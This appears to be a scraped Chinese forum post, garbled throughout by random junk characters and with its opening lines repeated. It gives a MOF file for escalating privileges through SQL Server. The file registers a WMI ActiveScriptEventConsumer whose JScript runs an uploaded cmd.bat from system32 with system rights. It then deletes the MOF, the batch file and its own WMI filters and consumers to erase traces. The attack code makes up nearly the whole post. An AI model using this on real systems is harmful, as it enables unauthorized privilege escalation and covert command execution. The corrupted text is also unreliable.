这个sql提权MOF需要运行 system下的文件,不能定义路径。9 z5 I Z8 s/ ^" f1 O( H! j
需要将要运行的命令写入到bat上传到system32目录,然后执行。' H1 H Q, b& u+ q. T& M
) m% {5 a. a: P. N3 a
这个sql提权MOF需要运行 system下的文件,不能定义路径。% g& c4 a9 _7 k" `" O5 o
需要将要运行的命令写入到bat上传到system32目录,然后执行。
* a% ^1 ^6 f" t5 }6 w2 ?1 r. l! O& D7 }+ V% A4 K
#pragma5 k' q0 W s3 }8 s8 K% w5 U
namespace("\\\\.\\root\\cimv2")! K! r3 `( P$ D3 O
class
: _& I. T B7 v" u MyClass547
$ e5 o7 B) A% d. [+ i+ ? { [key]
- ^0 {1 e6 z( E8 ?' _/ C string* _& V+ ^+ ?" z, q" d
Name;% @! g* x! {" F8 k1 m" O: J8 D
};
3 v: f3 S4 A2 ^$ u R9 r class6 v! {; `- p* a* ^7 [
ActiveScriptEventConsumer
. `' R. W% l# a& j: G : __EventConsumer { [key]( @$ t" q; r+ d
string5 B" K x3 P; M$ n. \4 {
Name; [not_null]8 D2 i* H7 a. L( w& a3 ?
string2 q' X1 q# n [1 f- }
ScriptingEngine; string0 p# q" ?2 b; R
ScriptFileName; [template]
; E9 R$ ]2 E" a- U% U8 i string
0 x- ^! o9 r9 j) C/ p& R5 S ScriptText; uint32 KillTimeout;2 [6 `( o" x# Z' {, \1 Z
}; instance of __Win32Provider as $P {2 h* w9 g4 r$ L1 g
Name* B3 k) f5 E3 X/ k/ s+ I
=
, Y1 ]! c: G; C& U2 X* V' W "ActiveScriptEventConsumer"; CLSID =
+ x P4 D! X9 }: m) r "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
. W4 E; g( T4 [2 ?/ s" y PerUserInitialization
1 [5 m7 u a( y- U {% M = TRUE;
2 R) V, J% C" w% @3 T1 g' ^ b }; instance of __EventConsumerProviderRegistration { Provider, |# |/ v% |9 d: V1 @
= $P; ConsumerClassNames( C% A2 q# n' @' i$ ^ N$ K% u
=
: p7 v, l; w: h! O1 ` {"ActiveScriptEventConsumer"};
9 m/ p9 z. r6 q* F# S };
, ]0 Y/ E0 P( ~5 i/ ~ Instance of ActiveScriptEventConsumer2 l/ M4 t5 Q* B9 r
as $cons { Name
* v. I$ X( b6 d" m! k& X* \ =( Z6 j8 y6 {" o2 t
"ASEC"; ScriptingEngine) o- g8 }9 z8 m) v. w F/ O
=% v7 \3 j+ O1 b- o5 V k
"JScript"; ScriptText8 h% j. r+ L3 a' U( x4 u% b# [
=2 x3 E$ v A5 B% } C
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
+ R, }! x6 g1 F5 p+ k' Q1 _$ c" M2 m0 L Instance of ActiveScriptEventConsumer
7 v8 q2 \% z: H `, L/ e, F as $cons2 { Name
9 U2 I0 ~- A+ T0 o* b =
0 U% _7 B4 M) y* p/ u8 B7 V& t- l. s "qndASEC"; ScriptingEngine
: P" u: Y; ~, D$ I+ _5 P' l! Y =
, X2 c$ s; }$ L* u+ F "JScript"; ScriptText9 T2 m! L" o# M% S1 N
=. c, p0 i) L* `/ U( q0 H
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";$ b4 {+ m4 Q7 F5 k2 r
}; instance of __EventFilter as $Filt { Name+ H- b, Y% Q- i" a+ b. |9 d9 J
=
* P* D+ e6 n' ~2 a+ N "instfilt"; Query7 [* ~( T( k1 j" j
=
5 {+ A( R; k% X0 A& r0 N2 ^ "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
* b* b" z4 w% E+ F& {# g =
1 [% D* C( K' W, [ "WQL"; }; instance of __EventFilter as $Filt2 { Name
* P7 x: W6 b2 w5 F! F =
- `& i d t4 r "qndfilt"; Query
( [. c8 G$ o7 b+ r8 z g( ^ =5 l3 _$ v9 X. E) w, y# f6 L
"SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage2 ]3 ?/ `2 o2 T
=
: ^( V, T, d' q; o W# f V N "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
. B y" M' C% l P R% R2 x = $cons; Filter
; i! A1 N; y. [2 q/ u = $Filt;0 L# ^; g4 S7 O- \
}; instance of __FilterToConsumerBinding as $bind2 { Consumer6 M! P2 i$ x% J3 X. ?" @% h
= $cons2; Filter9 L/ \( D: C- m; a% W- ?* |3 o' b
= $Filt2;
" k4 n- H+ x8 s% @2 h! ] ~! { }; instance of MyClass547
8 a7 n* I m/ L H! N) L- e7 a as $MyClass { Name) X% c! X L8 p
=
. C& }2 s1 s4 J, i$ S* B3 h "ClassConsumer";
% Q- C; H) k$ o6 V }; |